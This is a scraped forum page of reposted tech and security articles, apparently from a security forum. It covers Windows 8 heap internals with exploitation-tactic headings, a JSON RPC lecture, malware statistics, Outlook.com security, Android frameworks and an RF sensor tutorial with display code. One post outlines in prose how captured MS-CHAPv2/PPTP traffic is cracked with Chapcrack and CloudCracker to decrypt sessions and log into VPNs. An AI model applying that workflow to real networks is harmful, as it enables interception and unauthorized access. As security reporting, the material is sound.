    Windows 8 Heap Internals Contents Introduction .................................................................................................................................................. 4 Overview ....................................................................................................................................................... 4 Prior Works ................................................................................................................................................... 5 Prerequisites ................................................................................................................................................. 5 User Land .................................................................................................................................................. 5 Kernel Land ............................................................................................................................................... 5 Terminology .................................................................................................................................................. 6 User Land Heap Manager ............................................................................................................................. 7 Data Structures ......................................................................................................................................... 7 _HEAP (HeapBase) ................................................................................................................................ 7 _LFH_HEAP (Heap?>FrontEndHeap) ..................................................................................................... 8 _HEAP_LOCAL_DATA (Heap?>FrontEndHeap?>LocalData) ................................................................... 9 _HEAP_LOCAL_SEGMENT_INFO (Heap?>LFH?>SegmentInfoArrays[] / AffinitizedInfoArrays[]) .......... 9 _HEAP_SUBSEGMENT (Heap?>LFH?>InfoArrays[]?>ActiveSubsegment) ............................................ 10 _HEAP_USERDATA_HEADER (Heap?>LFH?>InfoArrays[]?>ActiveSubsegment?>UserBlocks) ............. 11 _RTL_BITMAP (Heap?>LFH?>InfoArrays[]?>ActiveSubsegment?>UserBlocks?>Bitmap) ..................... 12 _HEAP_ENTRY ..................................................................................................................................... 12 Architecture ............................................................................................................................................ 13 Algorithms ?? Allocation .......................................................................................................................... 15 Intermediate ....................................................................................................................................... 15 BackEnd ............................................................................................................................................... 18 Front End ............................................................................................................................................. 25 Algorithms – Freeing ............................................................................................................................... 37 Intermediate ....................................................................................................................................... 37 BackEnd ............................................................................................................................................... 40 FrontEnd .............................................................................................................................................. 44 Security Mechanisms .............................................................................................................................. 47 _HEAP Handle Protection ................................................................................................................... 47 Virtual Memory Randomization .......................................................................................................... 48 FrontEnd Activation ............................................................................................................................ 49 FrontEnd Allocation ............................................................................................................................ 50 Fast Fail ............................................................................................................................................... 52 Guard Pages ........................................................................................................................................ 53 Arbitrary Free ...................................................................................................................................... 56 Exception Handling ............................................................................................................................. 57 Exploitation Tactics ................................................................................................................................. 58 Bitmap Flipping 2.0 ............................................................................................................................. 58 _HEAP_USERDATA_HEADER Attack .................................................................................................... 60 User Land Conclusion .............................................................................................................................. 62 Kernel Pool Allocator .................................................................................................................................. 63 Fundamentals ......................................................................................................................................... 63 Pool Types ........................................................................................................................................... 63 Pool Descriptor ................................................................................................................................... 63 Pool Header ......................................................................................................................................... 64 Windows 8 Enhancements ..................................................................................................................... 66 Non?Executable (NX) Non?Paged Pool ................................................................................................ 66 Kernel Pool Cookie .............................................................................................................................. 69 Attack Mitigations ................................................................................................................................... 75 Process Pointer Encoding .................................................................................................................... 75 Lookaside Cookie ................................................................................................................................ 76 Cache Aligned Allocation Cookie ........................................................................................................ 77 Safe (Un)linking ................................................................................................................................... 78 PoolIndex Validation ........................................................................................................................... 79 Summary ............................................................................................................................................. 80 Block Size Attacks .................................................................................................................................... 82 Block Size Attack ................................................................................................................................. 82 Split Fragment Attack .......................................................................................................................... 83 Kernel Land Conclusion ........................................................................................................................... 85 Thanks ......................................................................................................................................................... 85 Bibliography ................................................................................................................................................ 86 Download: http://t.co/uOgkjkj4
  17. Nytro

    Json rpc

    Nytro posted a topic in Tutoriale video

    JSON RPC JSON RPC is a recently fashionable buzzword in the AJAX context. This lecture explains its principles, specifically the same origin policy for cross site scripting and its relation to JSON RPC, and demonstrates the essential implementation details using the example of the geocoding service in the google maps API. The collection of technologies on which modern web applications are based is nowadays summarily referred to as AJAX, or "Asynchronous JavaScript and XML". Interestingly, the use of XML as the data format for the transfer between client and server is not only unnecessarily complicated, but in its usual incarnation as XMLHttpRequest it is also subject to restrictions that prevent the direct use of web services from the client side of the web application. A natural alternative to the transport of XML data structures though the XMLHttpRequest API is the transport of literal JavaScript expressions (nowadays also called JSON, or "JavaScript Object Notation") through dynamically created SCRIPT elements. We discuss practical aspects of the implementation of this approach and the consequences for architecture and software design of web applications. Because the circumvention of restrictions that were originally meant to maintain security might be frightening at first sight, we recapitulate the principles on which cross site scripting restrictions are based, and we discuss why their circumvention for the purpose of JSON/SCRIPT based data transport doesn't infract the security of a web application. [TABLE=class: datatable] [TR] [TD=class: highlight]Authors[/TD] [TD=class: lowlight] Steffen Meschkat [/TD] [/TR] [TR] [TD=class: highlight]Submitted[/TD] [TD=class: lowlight]August 05, 2012[/TD] [/TR] [/TABLE] Audio: IT Security and Hacking knowledge base - SecDocs Slides: IT Security and Hacking knowledge base - SecDocs [TABLE=class: datatable] [TR] [TD=class: highlight]Source[/TD] [TD=class: lowlight]23C3-1568-en-json_rpc.m4v[/TD] [/TR] [TR] [TD=class: highlight]Size[/TD] [TD=class: lowlight]88.7 MB[/TD] [/TR] [/TABLE] Download: http://dewy.fem.tu-ilmenau.de/CCC/23C3/video/23C3-1568-en-json_rpc.m4v Sursa: IT Security and Hacking knowledge base - SecDocs
  18. Nytro
    [h=2][infographic] Where Malware Comes From[/h] Dan Rowinski· August 2nd, 2012 Malware is a worldwide problem. If there is electricity, an Internet connection and a computer, there will be viruses, worms, Trojans and other sneaky programs trying to gain access to your computer. Where do these nasty creatures come from? A large percentage of the world’s malware comes from China. According to AlienVault’s Open Threat Exchange platform, China is the capital of malicious Internet addresses, based on 95,249 addresses analyzed. The United States comes in second with 60,346, well ahead of the third, fourth and fifth malware vectors: South Korea (16,115), Russia (13,367) and Taiwan (12,504). How is this malware being delivered? The average virus wants to find its way into computers. Direct injection (where a virus is not hidden in a different type of file) is fairly rare. Far more commonly, malware hitches a ride on an otherwise benign file. This is the reason why security programs scan all files downloaded to a computer. The top malware-infested file type is .exe, the most common file type for a Windows program. The second most common carrier is HTML content, which can be found on almost any Web site as well as in emails. Zip and RAR files, which bundle together other file types, are the third most common, while Adobe PDF and Flash files are also prevalent malware delivery vehicles. The top types of viruses are all associated with Windows. While Mac malware exists and is becoming more prevalent, the amount of Windows malware on the Internet is nothing short of stunning. The top five malware content types found by the AlienVault community are all derivations of Windows viruses. Since February, the AlienVault Open Threat Exchange has analyzed over 5 million suspicious URLs. That is a drop in the bucket in comparison to the billions of sites on the Internet, but a large enough sample to provide a sense of how much malware is present on the Web. The company received nearly 30 million entries from its users and found a little more than a million malicious addresses. See the infographic below for more details. The data was aggregated from AlienVault’s Open Threat Exchange from Feb. 20 to July 20, 2012. The data comes from the company’s customers as well as its Open Source Security Information Management (OSSIM), an open-source security information event-management platform. Sursa: [infographic] Where Malware Comes From
  19. Nytro
    [h=1]A quick look at security features on Microsoft's new Outlook.com email service[/h]Posted on Sun, 05 Aug 2012 10:45 am EDT by Rich Edmonds With the launch of Microsoft's Outlook.com, many have been questioning security features of the new email service. The most dominant topic is the limit of 16 characters for passwords. This is a limitation that was also present in Hotmail / Live and has been brought forward into its successor (due to Microsoft's login system). We'll take a look at this issue as well as a quick overview of additional security measures Microsoft has implemented to keep your emails safe. Password character limitations A counter question would be do you honestly need more than 16 characters? It's an argument that could span a number of pages in a forum thread or accumulate a hundred or so comments on this article. One side could -- of course -- argue that using as many characters as possible is more secure due to the creation of more possible combinations. On the other hand, the password "123456789101112131415" is less secure than "3%84Dji8u&L8D", so it's more about how consumers create their account passwords. Using a random generator (or simply having some fun with random combinations in Notepad if you have the time) is always recommended - of course you should always note down what you've decided on. It's amusing to hear / read about company security holes due to employee passwords, "Admin" being the best example. It's certainly not rocket science. Microsoft has responded to concerns about the 16 character limit, should you be interested to read an official response: "We are working on increasing this. Unfortunately, for historical reasons, the password validation logic is decentralized across different products, so it's a bigger change than it should be and takes longer to get to market. It's also worth noting that the vast majority of compromised accounts are through malware and phishing. The small fraction of brute force is primarily common passwords like '123456' not due to a lack of complexity." That being said, we can't see an issue with the 16 character limitation. It shouldn't worry consumers when using the service. LinkedIn is a superb example of how security can go horribly wrong. Check out the following Rapid7 infographic (click for larger version) on the most popular passwords that were reportedly already cracked prior to the account passwords being stolen. You'll be surprised by what made the list. While we can understand the concern for the limitation and that those who are security obsessive would prefer to have a high amount of characters in passwords, it's not the end of the world should you ensure they're randomly generated with a sufficient combination of alphanumeric (and special) characters. Single-use codes for masking account credentials Microsoft has also implemented single-use codes for logging into Outlook.com when on a public computer or other devices where the user may be at risk of having their passwords detected. The single-use code enables Microsoft to text a passcode to the user's mobile phone (email and phone number required when attempting to login), which negates the need for the account password. The single-use code (as the name implies) can only be used once and is invalid once the user has successfully logged in. It's good to have extra protection in place for Outlook.com users to be able to access their email on computers / devices in public places. Two-factor authentication and no targeted advertising One of the major reasons Microsoft provides to attract Gmail users is the company will not be reading emails to provide targeted and relevant advertising using its network of publishers - remember the Gmail man? This ensures user data is kept private. While advertising is present on main folder view pages, its in the form of general adverts that will be displayed to everyone. Microsoft has also responded to a question on Reddit inquiring about two-factor authentication in its global login system: "Over the last 6 months we have rolled out two-factor authentication in several systems that use Microsoft account. For example, you need to use two-factor auth to buy stuff on xbox.com, to remotely fetch files from other computers on SkyDrive and more. We are learning a lot from this and have more in the works. We see two-factor auth as being an increasingly important piece of our protection suite." What we can all take away from this is that Microsoft is working hard on further tightening security in its products and backend services. We can expect to see more information and updates applied to enhance protection already implemented. All-in-all, rather good stuff. Let us know your thoughts in the comments, do you believe Microsoft is doing enough to secure your data in the cloud? Sursa: A quick look at security features on Microsoft's new Outlook.com email service | wpcentral | Windows Phone News, Forums, and Reviews
  20. Nytro
    [h=2]Top 15 Android-Ready Application Development Frameworks [/h]Wednesday, 01 August 2012 07:33 Eric Brown On July 20, Adobe unveiled version 2.0 of the open source PhoneGap, a leader among the growing crowd of cross-platform, Android-compatible, mobile app frameworks. Open source developers welcomed new PhoneGap features such as a "Cordova WebView" function that enables developers to integrate code into larger native applications. There are scores of such frameworks to choose from these days, and as seen in our Top 15 list below, the best are getting quite sophisticated. Yet there is still considerable grumbling about the state of mobile cross-platform frameworks. They may be fine for the majority of Android apps being developed, yet few seem to be capable of handling all the requirements of a professional-quality enterprise or consumer app. If you're familiar with Java and Eclipse, and Android is initially the sole destination, Google's Android SDK and related Android Development Tools (ADT) Eclipse plugin are probably the better choices. The problem is that most app publishers prefer to start with iOS, or else ship on iOS and Android simultaneously, with perhaps a BlackBerry or Windows Phone version as well. Others lack the experience to go native. Nevertheless, the official tools deserve a look, as it's usually difficult to port one's cross-platform effort to the Android SDK in mid-stream. So we'll start with Google's tools first before moving on to the multi-platform frameworks. [h=2]Google's Tools Get Friendlier[/h] Earlier this month, Google released Revision 20 of the SDK and ADT in conjunction with Android 4.1 ("Jelly Bean"), adding new debugging tools, application templates, and performance tweaks. Other Google tools include a native development kit (NDK) for hardware optimization and the Android Accessory gadget control application development kit (ADK). Android now offers an arguably superior platform to iOS. It provides much more flexibility, better app testing, and easier app approvals. Yet when it comes to overall ease of use, Apple may still have the edge. Although Android uses an easier, more widely known language in Java, Android's rich feature set and multitasking features are harder to master, and version- and device fragmentation can slow things down considerably. There are no easy fixes for these problems, but Google has at least worked hard to reduce the learning curve. Last month it revamped its Android Developers website to make it more accessible, following up on its previous launch of an Android training program and the publication of a style guide. [h=2]Cross-Platform Frameworks Duke it Out[/h] According to the Eclipse Open Source Developer Report 2012, 60 percent of open source developers writing Android or iOS apps use only the official SDK. Among those who use cross-platform frameworks, the choices, ranked from first to last were: - jQuery Mobile (28.6 percent) - PhoneGap (17.9) - Sencha Touch (7.9) - Dojo Mobile (4.9) - Titanium (2.8). These multi-platform options are typically open source JavaScript frameworks with support for HTML5 and CSS. Aimed primarily at web developers, they are often used for migrating website content to app form. The frameworks support Android and iOS at a minimum, and often target BlackBerry, Windows Phone, and Symbian. Although they typically come with a "write once, run anywhere" promise, the amount of tweaking required for each version can still be considerable, and optimization of memory, battery life, and performance is often limited. Most of the frameworks offer drag-and-drop GUI design tools, and many incorporate APIs aimed at exploiting specific components like audio and GPS. Quite a few are built on the Model View Controller (MVC) UI and component interaction model. [h=2]Platforms for Coding Beyond JavaScript[/h] While PhoneGap and most of the leading frameworks are web-oriented HTML5/JavaScript apps that can tap native functions, some, like Appcelerator's Titanium, generate native Java code. While this approach has potential performance advantages, it tends to limit code reusability. Some frameworks specialize in programming environments beyond JavaScript. For example: - RhoMobile is designed for Ruby developers. - MoSync is aimed at C++ hackers. - C#-flavored Mono for Android appeals to enterprise-focused developers familiar with Visual Studio. Game developers, meanwhile, tend to use gaming-focused frameworks that offer specialized level-creation features, game engines, and 3D animation support: - Corona SDK (the main player here) - Flixel - Unity3D. Educational organizations and others with limited needs and limited resources can turn to codeless, cross-platform app-building environments like TheAppBuilder. Google abandoned its own codeless App Inventor, but it was recently re-launched by MIT as the MIT App Inventor. [h=2]Other Android-Ready Options[/h] On the opposite extreme, those aiming to develop complex applications, often in conjunction with new hardware, may prefer the robust, commercial Android-compatible platforms from embedded Linux OS vendors like Wind River, MontaVista, and Mentor Graphics. These are especially useful when targeting form factors beyond smartphone and tablets. The Wind River Platform for Android run-time environment includes an optimized Android SDK, middleware, device drivers, and testing suites, as well as vertical market accelerators. Those looking to optimize their apps for particular processors can also find Android-ready tools from major ARM semiconductor vendors like Texas Instruments and Freescale, as well as ARM itself. Open source development board projects offer similar tools. MIPS and Intel, meanwhile, are building Android tools to support their own respective architectures. Other Android-ready tools focus on particular steps in the development process. These include: - Testing (Testroid, Appthwack) - Performance management (Crittercism NDK) - GUI design (DroidDraw, SPB UI Builder). The latter category includes GUI tools from Motorola, HTC, and Samsung, designed for their respective UI skins. Finally, new cloud-oriented tools such as OpenMobster and Cumulus provide sync and other cloud support for Android apps. [h=2]15 Android-Ready Development Frameworks[/h] The following are 15 of the more popular Android development tools. Unless otherwise noted, they are open source, cross-platform frameworks: Basic4android: Anywhere Software's commercial RAD tool and IDE for Android provides a comprehensive feature set and an object-oriented programming language similar to Visual Basic. Basic4android (Basic for Android) - Android programming with Gui designer Corona SDK: Widely used among game developers, Corona is also a popular, general-purpose framework. Corona Labs (formerly Ansca Mobile) claims an installed base of 120,000 developers. This high-end, commercial SDK offers over 500 APIs, as well as advertising and native UI support, and a built-in physics engine. The Leader in Cross Platform Mobile App Development DHTMLX Touch: This JavaScript and AJAX library focuses on UI widgets, and is aimed at building HTML5-based apps. DHTMLX Touch - JavaScript Mobile Framework for Building HTML5 Web Apps Dojo Mobile: The Dojo community's BSD-licensed HTML5/JavaScript framework has added MVC and app-controller packages, as well as mobile-specific components such as switches and sliders. A degree of PhoneGap compatibility is also available. Dojo Mobile - The Dojo Toolkit iUI: This lightweight web UI framework includes a JavaScript library, CSS support, and development images. iUI - Mobile web framework for high-end devices jQuery Mobile: This popular, lightweight HTML5-based framework is built on jQuery, and focuses on semantic markup, progressive enhancement, and themable design. It's the leading cross-platform framework among Eclipse open source developers. jQuery Mobile | jQuery Mobile Kendo UI: Telerik's HTML5/JavaScript framework is available in open source and commercial versions. Kendo UI offers a wide selection of UI widgets and plugins, and provides an MVVM framework, performance optimization, and validation and internationalization features. Kendo UI - The Art of Web Development Mono for Android: Xamarin's C#- and enterprise-oriented package is compatible with a similar iOS-based MonoTouch version, and can also share code with the C#-based Windows Phone. Mono supplies an environment conducive to Visual Basic developers, and is touted for its debugger and native binary compiler. Xamarin MoSync SDK: MoSync supports C++, HTML5/JavaScript, or both on up to nine different platforms. The SDK is touted as being compatible with PhoneGap, as well MoSync's own new HTML5/JavaScript-based native mobile app developer/simulator, MoSync Reload. Create iPhone and Android apps with JavaScript and C++ | cross-platform mobile application development PhoneGap: Designed for JavaScript, HTML5, and CSS development, PhoneGap is now sponsored by Adobe and the Apache Foundation. The 2.0 version adds Windows Phone support, new CLI functions, and overhauled JavaScript libraries. It also debuts Cordova WebView, an embeddable HTML rendering control that uses Apache's Cordova-JS API for tasks such as integrating PhoneGap code into larger native apps. PhoneGap | Home RhoMobile Suite: Motorola's mature, business-oriented framework features RhoConnect, RhoStudio, RhoElements, and a new RhoHub used for cloud app-building. RhoMobile is built on the Ruby language, the Rails Frameworks, and the MVC model. RhoMobile Suite - Motorola Solutions USA Sencha Touch 2: Sencha's popular HTML5/JavaScript framework provides 50 built-in components, state management, and an integrated MVC system. It now offers a free native packager that streamlines distribution to stores like Google Play. http://www.sencha.com/products/touch/ SproutCore: This HTML5-driven framework offers a "clean" MVC architecture, and emphasizes performance optimization and scalability. SproutCore TheAppBuilder: JamPot's new HTML5-based native app-building app has received plenty of buzz. It features a codeless, drag-and-drop interface that lets users quickly build fairly rudimentary apps by filling in Q&A checklists. Highlights include extensive social networking integration and automated submissions to Google Play. TheAppBuilder Titanium: Appcelerator claims its Android/iOS framework supports over 5,000 device and mobile-OS APIs. Unlike the more web-oriented frameworks, Titanium uses JavaScript to create native code, with claimed benefits in performance. Titanium SDK | Appcelerator Additional Android-compatible development options include Andromo, Application Craft, Hypernext Android Creator (HAC), Jo, jQTouch, MIT App Inventor, Togosoft Device Browser, Unity Mobile, WebApp.Net, Wink Toolkit, xUI, and Zepto.js. For more options, check out these roundups of Android development software from BuildMobile, Daily Tekk, MobiGeni, and Technology Trend Analysis. Meanwhile, post your own favorites in the comments section below. Sursa: https://www.linux.com/news/embedded-mobile/mobile-linux/612366-15-android-ready-application-development-frameworks-
  21. Nytro
    [h=1]Building wireless sensor applications using Dorji’s DRF5150S and DRF4432S RF modules (Part 1) [/h] Dorji Applied Technology is a China-based company that primarily focuses on building different types of RF modules that can be easily incorporated in designing wireless data loggers, sensor network, telemetry and other wireless applications. Their products mostly use RF transceiver chips from ADI, Infineon, and Silicon Labs. Some of their RF modules have an additional preprogrammed microcontroller that allows direct interface of selected analog and digital sensors to the module. This means you don’t need any external MCU or to write codes for these sensors. I have been playing with their DRF5150S and DRF4432S RF modules for past couple weeks and I should admit that they are very versatile and easy to use. In this blog post, I will describe these two modules briefly, and illustrate how to put them together to construct a simple wireless sensor application where data from a remote sensor are received and displayed on a PC, without using any external microcontrollers. Dorji's DRF5150S wireless sensor module DRF5150S transmitter module DRF5150S is a 433 MHZ ISM band transmitter module based on Infineon’s TDA5150 device, which is a low power, multiband, multichannel ASK/FSK/GFSK RF transmitter chip for the sub 1GHz ISM bands (300-320 MHz, 425-450 MHz, 863 – 928 MHz) and with RF-output power of up to +10 dBm. The DRF5150S module has also got an ultra-low power STM8L151 microcontroller on board that is preprogrammed to control the overall operation of the transmitter. The module operates from 2.1-3.6V. The power supply and input/output pins are brought out to 0.1? male header pins to make prototyping easier. The module can be configured to operate in one of the following two modes: 1. Data transmission mode In data transmission mode the DRF5150S module acts as a normal data transmitter. It receives data from a host MCU through a standard UART serial port and then sends them out to RF receiving module. The receiving RF module that can be used with DRF5150S is DRF4432S. We will talk about that later. The DRF5150S also features sleep mode during which no data is transmitted and the module consumes only 1.5µA of current. 2. Sensor data mode The preprogrammed STM8L151 microcontroller on board allows you to connect selected digital and analog sensors directly to the DRF5150S module, which is a very nice feature of it. In this mode, the DRF5150S transmits the sensor data continuously at a preset interval along with its ID and the battery voltage information. The ID is useful to identify the source of transmission when there is more than one DRF5150S modules transmitting. The ID is divided into two parts: Group ID and Slave ID. The Group ID of the receiving module (DRF4432S) should match with the Group ID of the transmitting module otherwise the receiver will ignore the transmitted data. However, multiple DRF5150S modules can share the same Group ID, but they should have different Slave ID’s for identification on the receiving end. The module provides a 12-bit ADC channel that allows you to connect analog sensors, such as PT1000, LM34, LM35, TMP35, etc. It also features direct interfacing capability for DS18B20, SHT1X, and SHT2X digital sensors. The following picture shows the DRF5150S module and its pin configurations. The RXD and TXD are UART receive and transmit lines. They do have alternative functions based on the mode of operation. DRF5150S pins Configuration tool As I mentioned earlier, the DRF5150S provides multiple modes of operation. The module can be configured for a particular mode using a PC software, DRF Tool, downloadable from the Dorji’s website. The DRF Tool is a Windows based GUI application that communicates with the DRF5150S module connected to the PC through an USB-UART adapter. The TXD, RXD, VCC, and GND pins of the DRF5150S module should be connected to the corresponding pins of the USB-UART module. Note that the VCC voltage should be 3-3.6V. Here is a snapshot of the DRF Tool. All supported modes can be seen through the Sensor Type drop-down menu, and you pick one that you want to configure your DRF5150S module to. There are lot of other things that you can do with this tool, such as setting the TX interval, RF frequency and data rate, sensor ID, etc. DRF Tool for configuring 5150S module For illustrative purpose we will configure the transmitter module to DS18B20 High Resolution Mode. In this mode, a DS18B20 sensor can be directly interfaced to the DRF5150S module for measuring temperature with high resolution (12-bit). So we will select DS18B20 (High Resolution Mode) from the sensor type drop-down menu and set the transmitting interval to 2 seconds. Rest of the parameters are set as shown above. Now, we click on Write W button to send these configuration settings to the DRF5150S module connected to the PC. The STM8L151 microcontroller on board receives this information and saves into its internal EEPROM. The DRF5150S module is now configured for interfacing the DS18B20 temperature sensor. You should connect the sensor to the RF module as shown below. Connecting a DS18B20 sensor to DRF5150S RF module DRF5150S RF transmitter and DS18B20 sensor setup on breadboard I have made this setup on a breadboard and powered the circuit with a coin cell 3V battery (see the picture above). The DRF5150S reads 12-bit temperature data from the DS18B20 sensor and transmit it (with 2 seconds interval) at 50KBPS data rate using 434 MHz GFSK modulation. The transmitted data format of the DRF5150S is, ID bytes (Group+Slave) + Data + BAT The Group and Slave IDs are 1 byte each. The Data is 2 byte long for DS18B20 sensor. The last byte (BAT) contains the information of the battery strength. You can calculate the battery voltage from BAT as, Battery voltage = (BAT+200)/100 Altogether 5 bytes are transmitted for each temperature sample. Now lets look at the DRF4432S module which is a matching receiver for the DRF5150S transmitter. In order to make this pair to work together, they must be configured identically. Dorji’s DRF4432S receiver module The DRF4432S is a GFSK receiver module based on Silicon Laboratories’ Si4432 wireless ISM transceiver chip. This module is used together with DRF5150S to build wireless sensor applications. It receives data from the DRF5150S transmitter module and transfers it through an UART serial interface. The picture below shows the pin diagrams of the DRF4432S module. Please refer the datasheet to find more details about these pins and their functions. DRF4432S pins The DRF4432S module must be configured in the same working mode as its complementary DRF5150S module. The configuration of the DRF4432S is done in the similar way using the DRF Tool. Again you need to connect the DRF4432S to the PC using an USB-UART adapter. Make sure you chose the same parameters in the DRF Tool for the receiver as you did for the transmitter. For our test application, the DRF4432S receiver module is also configured to DS18B20 High Resolution Mode, with RF frequency 434 MHz, RF data rate 50KBPS, and TX interval 2 sec. The transmitting and receiving modules can be configured to operate in a different frequency channel with 200 KHz spacing. DRF4432S is configured similarly as DRF5150S We now interface the DRF4432S to the PC through the USB-UART adapter so that the received data bytes can be transferred to the PC. A PC application is developed using Processing language, which receives the data and displays them on screen. The Enable (EN) pin of the DRF4432S must be pulled low in order for it to work. If the EN pin is pulled high, the receiver goes in to sleep mode. Since the DRF4432S has got an on-board 3.3V regulator, it can operate from 3.4V to 5.5V. DRF4432S is connected to PC using an USB-UART adapter DRF4432S and USB-UART connection The output data format of the DRF4432S receiver is ID (group ID + slave ID) +Data + Bat + RSSI It is same as that of the transmitter module except there is an additional byte (RSSI) which gives the field strength of received signal. The higher value of RSSI means more reliable wireless link. The product datasheet says if RSSI < 64 at 50Kbps RF data rate, then the field strength is considered weak and the probability of package loss is high. N Processing application The following Processing code is written to receive six bytes of data from the DRF4432S receiving module connected to the PC through an USB-UART interface. Information like temperature of the remote station as sent by the DRF5150S module, slave ID of the remote transmitting module, the battery voltage on the transmitting side, and the strength of the RF link between the transmitter and the receiver are extracted and displayed on the computer screen. /* Project: Wireless sensor application using DRF5150S and DRf4432S Written by: Rajendra Bhatt (www.embedded-lab.com) Date: 2012/08/2 */ //import Serial communication library import processing.serial.*; // Variable declaration PFont font22, font44, font14; PFont font12; float tempC; float tempF; float y, h, BattV,Slave_ID, Byte1, Byte2, Byte3, Byte4, Byte5, Byte6, RSSI; Serial USB_UART; int i, j, xx=-15; void setup() { // Define size of window size(350, 350); //setup fonts for use throughout the application font22 = loadFont("MicrosoftYaHei-22.vlw"); font12 = loadFont("MicrosoftYaHei-12.vlw"); font44 = loadFont("FranklinGothic-Demi-32.vlw"); font14 = loadFont("TimesNewRomanPS-BoldMT-16.vlw"); //init serial communication port USB_UART = new Serial(this, "COM6", 9600); } void draw() { while (USB_UART.available() > 0) { Byte1 = USB_UART.read(); delay(20); Byte2 = USB_UART.read(); delay(20); Byte3 = USB_UART.read(); delay(20); Byte4 = USB_UART.read(); delay(20); Byte5 = USB_UART.read(); delay(20); Byte6 = USB_UART.read(); background(250, 250, 250); // Light blue color fill(200, 6, 0); smooth(); stroke(0); strokeWeight(2); ellipse(100, 280, 58, 50); noStroke(); fill(0, 46, 200); arc(100, 60, 30, 20, PI, PI+PI); rect(85,60,30,200); fill(250,250, 250); rect(95,60,10,200); // Marks on thermometer stroke(0); strokeWeight(1); textAlign(RIGHT); fill(0,46,250); for (int i = 0; i < 5; i += 1) { line(70, 230-40*i, 80, 230-40*i); if(i < 4) line(75, 210-40*i, 80, 210-40*i); textFont(font12); text(str(40+20*i), 65, 235-40*i); } textAlign(LEFT); for (int i = 0; i < 6; i += 1) { line(118, 242-35*i, 128, 242-35*i); if(i < 5) line(118, 225-35*i, 123, 225-35*i); textFont(font12); text(str(0+10*i), 135, 247-35*i); } noStroke(); fill(0,46,250); textFont(font22); textAlign(LEFT); text("F", 57, 46); text("C", 135, 46); textFont(font12); text("o", 45, 35); text("o", 125, 35); fill(250,90,0); textFont(font22); text("o", 300+xx, 45); text("o", 300+xx, 85); // DS18B20 conversion tempC = Byte4*256+Byte3; tempC = tempC/16; BattV = (Byte5+200)/100; Slave_ID = Byte2; tempF = ((tempC*9)/5) + 32; textFont(font44); RSSI = Byte6; text(nfc(tempC, 2), 200+xx, 60); text(nfc(tempF, 2), 200+xx, 100); text("C", 320+xx, 60); text("F", 320+xx, 100); textFont(font14); text("Battery Voltage = V", 190+xx, 140); text(nfc(BattV, 2), 313+xx, 140); text("Signal Strength = ", 190+xx, 160); text(nfc(RSSI,0), 313+xx, 160); text("Slave ID = ", 190+xx, 180); text(nfc(Slave_ID,0), 313+xx, 180); // Raise mercury level fill(200,0, 0); y = -2.0*tempF + 310; h = 270-y; rect(95, y, 10, h); } } Download Processing source code and executables for different platforms (Windows, Linux, MacOS) Output I tested the setup by putting the DRF5150S sensor transmitter module in the front door porch of my house and the receiver module is connected to the PC in my spare bedroom on the second floor. The distance between the two is around 70 feet no line-of-sight. The received signal strength is found to be 179 (out of 255), which is really good. Wireless sensor transmitter on my front door porch Data received by DRF4432S module are displayed on the computer screen Summary DRF5150S and DRF4432S are two complimentary GFSK RF transmitter and receiver modules working in 433 MHz ISM band and are manufactured by Dorji Applied Technology. The presence of a pre-programmed microcontroller on board allows to connect selected analog and digital sensors directly to the DRF5150S module, which collects data from the sensor and sends out to the DRF4432S module at a configurable interval. The transmitter and the receiver can be both configured to operate for a particular sensor type through a PC software. For illustrative purpose, we constructed a very simple wireless sensor application where the DRF5150S module read 12-bit temperature data from a DS18B20 sensor and transmitted it continuously at an interval of 2 seconds. The DRF4432S receiver successfully received the temperature, ID, and Battery strength bytes sent by the DRF5150S module and transferred the data to a PC through an USB-UART interface. A Processing application was developed to display the received data on computer screen. More features and applications of these two RF modules will be explored in the second part of this tutorial. So stay tuned! Sursa: Building wireless sensor applications using Dorji’s DRF5150S and DRF4432S RF modules (Part 1) :Embedded Lab
  22. Nytro
    [h=2]Chapcrack and CloudCracker unlock MS-CHAPv2 based VPN Traffic[/h] For those of us who missed David Hulton and Moxie Marlinspike’s Defcon 20 presentation on cracking MS-CHAPv2, here is an overview: 1) All users and providers of PPTP VPN solutions should immediately start migrating to a different VPN protocol. PPTP traffic should be considered unencrypted. 2) Enterprises who are depending on the mutual authentication properties of MS-CHAPv2 for connection to their WPA2 Radius servers should immediately start migrating to something else. That is all, have a nice day… Wait a minute, “PPTP traffic should be considered unencrypted,” what??? A recently released article by Moxie explains in detail how they are able to crack MS-CHAPv2 communication, used in many PPTP based VPNs with a 100% success rate. But that is not all, the protocol is also used in WPA2 enterprise environments for connecting to Radius authentication servers. Ouch… When VPNs started to become popular I remember the constant mantra that remote VPN communication is safe because it uses PPTP, safely encapsulating your traffic before sending it over the web. Well, it looks like this may not be the case anymore. From Moxie’s article the weakness lays in the user password hash and three DES keys used in the encoding operation: “The hash we’re after, however, is used as the key material for three DES operations. DES keys are 7 bytes long, so each DES operation uses a 7 byte chunk of the MD4 hash output. This gives us an opportunity for a classic divide and conquer attack. Instead of brute forcing the MD4 hash output directly (a complexity of 2128), we can incrementally brute force 7 bytes of it at a time.“ The keys come from the output of the MD4 of the password, which is only 16 bytes. Microsoft fills in the difference by padding the last key with zeros: In doing so, this can significantly reduce the cracking time. Moxie created a tool called Chapcrack that will pull the necessary information from a network packet capture and cracks the third DES key. But this still leaves the first two DES keys, which could take a long time to crack. Unless, that is, you take the output from Chapcrack and upload it to CloudCracker. Cloudhacker is an online password cracking service that connects to a mean FPGA based box built by Pico Computing that they claim can crack any DES key within 24 hours: “They were able to build an FPGA box that implemented DES as a real pipeline, with one DES operation for each clock cycle. With 40 cores at 450mhz, that’s 18 billion keys/second. With 48 FPGAs, the Pico Computing DES cracking box gives us a worst case of ~23 hours for cracking a DES key, and an average case of about half a day.” So basically, if you can get a network packet capture, you can use Chapcrack to pull the DES key from it, and then pass it to CloudCracker to crack it within 24 hours. Then you can decrypt the entire network packet capture, or login to the users VPN or radius server. Nice… Looks like it is time to move on from MS-CHAPv2 based security products. Sursa: Chapcrack and CloudCracker unlock MS-CHAPv2 based VPN Traffic
  23. Nytro
